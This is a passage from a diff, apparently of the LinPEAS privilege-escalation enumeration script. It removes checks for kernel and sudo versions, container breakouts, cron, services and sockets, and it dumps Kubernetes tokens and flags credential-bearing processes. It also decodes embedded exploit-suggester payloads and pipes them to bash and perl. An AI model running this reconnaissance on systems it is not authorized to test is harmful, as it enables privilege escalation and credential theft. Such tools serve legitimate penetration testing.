"s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," - warn_exec lsb_release -a 2>/dev/null - if [ "$MACPEAS" ]; then - warn_exec system_profiler SPSoftwareDataType - fi - echo "" - #-- SY) Sudo - print_2title "Sudo version" - if [ "$(command -v sudo 2>/dev/null)" ]; then - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" - sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," - else echo_not_found "sudo" - fi - echo "" - #--SY) USBCreator - print_2title "USBCreator" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" - if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then - pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") - if [ -z "$pc_version" ]; then - pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) - fi - if [ -n "$pc_version" ]; then - pc_length=${#pc_version} - pc_major=$(echo "$pc_version" | cut -d. -f1) - pc_minor=$(echo "$pc_version" | cut -d. -f2) - if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then - echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," - fi - fi - fi - echo "" - #-- SY) PATH - print_2title "PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" - echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" - echo "" - #-- SY) Date - print_2title "Date & uptime" - warn_exec date 2>/dev/null - warn_exec uptime 2>/dev/null - echo "" - #-- SY) System stats - print_2title "System stats" - (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" - warn_exec free 2>/dev/null - echo "" - #-- SY) CPU info - print_2title "CPU info" - warn_exec lscpu 2>/dev/null - echo "" - #-- SY) Environment vars - print_2title "Environment" - print_info "Any private information inside environment variables?" - (env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" - echo "" - #-- SY) Dmesg - print_2title "Searching Signature verification failed in dmseg" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" - (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" - echo "" - #-- SY) Kernel extensions - if [ "$MACPEAS" ]; then - print_2title "Kernel Extensions not belonging to apple" - kextstat 2>/dev/null | grep -Ev " com.apple." - - print_2title "Unsigned Kernel Extensions" - macosNotSigned /Library/Extensions - macosNotSigned /System/Library/Extensions - fi - - if [ "$(command -v bash 2>/dev/null)" ]; then - print_2title "Executing Linux Exploit Suggester" - print_info "https://github.com/mzet-/linux-exploit-suggester" - les_b64="peass{LES}" - echo $les_b64 | base64 -d | bash - echo "" - fi - - if [ "$(command -v perl 2>/dev/null)" ]; then - print_2title "Executing Linux Exploit Suggester 2" - print_info "https://github.com/jondonas/linux-exploit-suggester-2" - les2_b64="peass{LES2}" - echo $les2_b64 | base64 -d | perl - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Doctor Suggestions" - brew doctor - echo "" - fi - - - - #-- SY) AppArmor - print_2title "Protections" - print_list "AppArmor enabled? .............. "$NC - if [ "$(command -v aa-status 2>/dev/null)" ]; then - aa-status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then - apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then - ls -d /etc/apparmor* - else - echo_not_found "AppArmor" - fi - - #-- SY) grsecurity - print_list "grsecurity present? ............ "$NC - ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") - - #-- SY) PaX - print_list "PaX bins present? .............. "$NC - (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") - - #-- SY) Execshield - print_list "Execshield enabled? ............ "$NC - (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," - - #-- SY) SElinux - print_list "SELinux enabled? ............... "$NC - (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - - #-- SY) Gatekeeper - if [ "$MACPEAS" ]; then - print_list "Gatekeeper enabled? .......... "$NC - (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - - print_list "sleepimage encrypted? ........ "$NC - (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no - - print_list "XProtect? .................... "$NC - (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no - - print_list "SIP enabled? ................. "$NC - csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no - - print_list "Connected to JAMF? ........... "$NC - warn_exec jamf checkJSSConnection - - print_list "Connected to AD? ............. "$NC - dsconfigad -show && echo "" || echo_no - fi - - #-- SY) ASLR - print_list "Is ASLR enabled? ............... "$NC - ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) - if [ -z "$ASLR" ]; then - echo_not_found "/proc/sys/kernel/randomize_va_space"; - else - if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi - echo "" - fi - - #-- SY) Printer - print_list "Printer? ....................... "$NC - (lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null - - #-- SY) Running in a virtual environment - print_list "Is this a virtual machine? ..... "$NC - hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) - if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then - detectedvirt=$(systemd-detect-virt) - if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi - else - if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi - fi - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q Container; then - ############################################## - #---------------) Containers (---------------# - ############################################## - print_title "Containers" - containerCheck - - print_2title "Container related tools present" - command -v "$CONTAINER_CMDS" - - print_2title "Container details" - print_list "Is this a container? ...........$NC $containerType" - - print_list "Any running containers? ........ "$NC - # Get counts of running containers for each platform - dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) - podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) - lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) - rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) - if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then - echo_no - else - containerCounts="" - if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi - if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi - if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi - if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi - echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," - # List any running containers - if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi - if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi - fi - - #If docker - if echo "$containerType" | grep -qi "docker"; then - print_2title "Docker Container details" - inDockerGroup - print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Looking and enumerating Docker Sockets\n"$NC - enumerateDockerSockets - print_list "Docker version .................$NC$dockerVersion" - checkDockerVersionExploits - print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - if [ "$inContainer" ]; then - checkDockerRootless - print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," - fi - if df -h | grep docker; then - print_2title "Docker Overlays" - df -h | grep docker - fi - fi - - if [ "$inContainer" ]; then - echo "" - print_2title "Container & breakout enumeration" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC $(cat /etc/hostname)" - if echo "$containerType" | grep -qi "docker"; then - print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" - fi - if echo "$containerType" | grep -qi "kubernetes"; then - print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" - print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" - fi - - checkContainerExploits - print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - echo "" - - print_2title "Container Capabilities" - capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" - echo "" - - print_2title "Privilege Mode" - if [ -x "$(command -v fdisk)" ]; then - if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then - echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," - else - echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," - fi - else - echo_not_found - fi - echo "" - - print_2title "Interesting Files Mounted" - (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" - echo "" - - print_2title "Possible Entrypoints" - ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq - echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - - -if echo $CHECKS | grep -q Devs; then - ########################################### - #---------------) Devices (---------------# - ########################################### - print_title "Devices" - - #-- 1D) sd in /dev - print_2title "Any sd*/disk* disk in /dev? (limit 20)" - ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 - echo "" - - #-- 2D) Unmounted - print_2title "Unmounted file-system?" - print_info "Check if you can mount umounted devices" - if [ -f "/etc/fstab" ]; then - grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" - else - echo_not_found "/etc/fstab" - fi - echo "" - - print_2title "Mounted disks information" - warn_exec diskutil list - echo "" - - print_2title "Mounted SMB Shares" - warn_exec smbutil statshares -a - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q AvaSof; then - ########################################### - #---------) Available Software (----------# - ########################################### - print_title "Available Software" - - #-- 1AS) Useful software - print_2title "Useful software" - command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null - echo "" - - #-- 2AS) Search for compilers - print_2title "Installed Compiler" - (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); - echo "" - - if [ "$(command -v pkg 2>/dev/null)" ]; then - print_2title "Vulnerable Packages" - pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Installed Packages" - brew list - echo "" - fi - - if [ "$MACPEAS" ]; then - print_2title "Writable Installed Applications" - system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - - system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - echo "" - - #Useless info - #print_2title "Developer Tools" - #system_profiler SPDeveloperToolsDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks; then - #################################################### - #-----) Processes & Cron & Services & Timers (-----# - #################################################### - print_title "Processes, Cron, Services, Timers & Sockets" - - #-- PCS) Cleaned proccesses - print_2title "Cleaned processes" - if [ "$NOUSEPS" ]; then - printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC - fi - print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - - if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - pslist=$(print_ps) - else - (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then - cpid=$(echo "$psline" | awk '{print $2}') - caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" - fi - fi - done - pslist=$(ps auxwww) - echo "" - - #-- PCS) Binary processes permissions - print_2title "Binary processes permissions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - binW="IniTialiZZinnggg" - ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do - if [ -w "$bpath" ]; then - binW="$binW|$bpath" - fi - done - ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," - fi - echo "" - - #-- PCS) Files opened by processes belonging to other users - if ! [ "$IAMROOT" ]; then - print_2title "Files opened by processes belonging to other users" - print_info "This is usually empty because of the lack of privileges to read other user processes information" - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - echo "" - fi - - #-- PCS) Processes with credentials inside memory - print_2title "Processes with credentials in memory (root req)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" - if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi - if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi - if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi - if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi - if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi - if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi - echo "" - - #-- PCS) Different processes 1 min - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then - print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" - temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi - echo "" - fi - - #-- PCS) Cron - print_2title "Cron jobs" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" - command -v crontab 2>/dev/null || echo_not_found "crontab" - crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - command -v incrontab 2>/dev/null || echo_not_found "incrontab" - incrontab -l 2>/dev/null - ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - crontab -l -u "$USER" 2>/dev/null | tr -d "\r" - ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths - atq 2>/dev/null - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Third party LaunchAgents & LaunchDemons" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" - ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null - echo "" - - print_2title "Writable System LaunchAgents & LaunchDemons" - find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do - program="" - program=$(defaults read "$f" Program 2>/dev/null) - if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) - fi - if [ -w "$program" ]; then - echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - done - echo "" - - print_2title "StartupItems" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" - ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null - echo "" - - print_2title "Login Items" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" - osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null - echo "" - - print_2title "SPStartupItemDataType" - system_profiler SPStartupItemDataType - echo "" - - print_2title "Emond scripts" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" - ls -l /private/var/db/emondClients - echo "" - fi - - #-- PCS) Services - print_2title "Services" - print_info "Search for outdated versions" - (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" - echo "" - - #-- PSC) systemd PATH - print_2title "Systemd PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" - systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" - WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") - echo "" - - #-- PSC) .service files - #TODO: .service files in MACOS are folders - print_2title "Analyzing .service files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" - printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do - if [ ! -O "$s" ]; then #Remove services that belongs to the current user - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" - fi - servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths - printf "%s\n" "$servicebinpaths\n" | while read sp; do - if [ -w "$sp" ]; then - echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" - fi - done - relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") - relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") - if [ "$relpath1" ] || [ "$relpath2" ]; then - if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; - else - echo "$s is executing some relative path" - fi - fi - fi - done - if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi - echo "" - - #-- PSC) Timers - print_2title "System timers" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found - echo "" - - #-- PSC) .timer files - print_2title "Analyzing .timer files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do - if ! [ "$IAMROOT" ] && [ -w "$t" ]; then - echo "$t" | sed -${E} "s,.*,${SED_RED},g" - fi - timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) - printf "%s\n" "$timerbinpaths" | while read tb; do - if [ -w "$tb" ]; then - echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" - fi - done - #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" - #for rp in "$relpath"; do - # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" - #done - done - echo "" - - #-- PSC) .socket files - #TODO: .socket files in MACOS are folders - if ! [ "$IAMROOT" ]; then - print_2title "Analyzing .socket files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" - fi - socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketsbinpaths" | while read sb; do - if [ -w "$sb" ]; then - echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" - fi - done - socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketslistpaths" | while read sl; do - if [ -w "$sl" ]; then - echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; - fi - done - done - if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then - echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" - fi - if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then - echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" - fi - echo "" - - print_2title "Unix Sockets Listening" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - # Search sockets using netstat and ss - unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") - fi - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) - fi - - # But also search socket files - unix_scks_list2=$(find / -type s 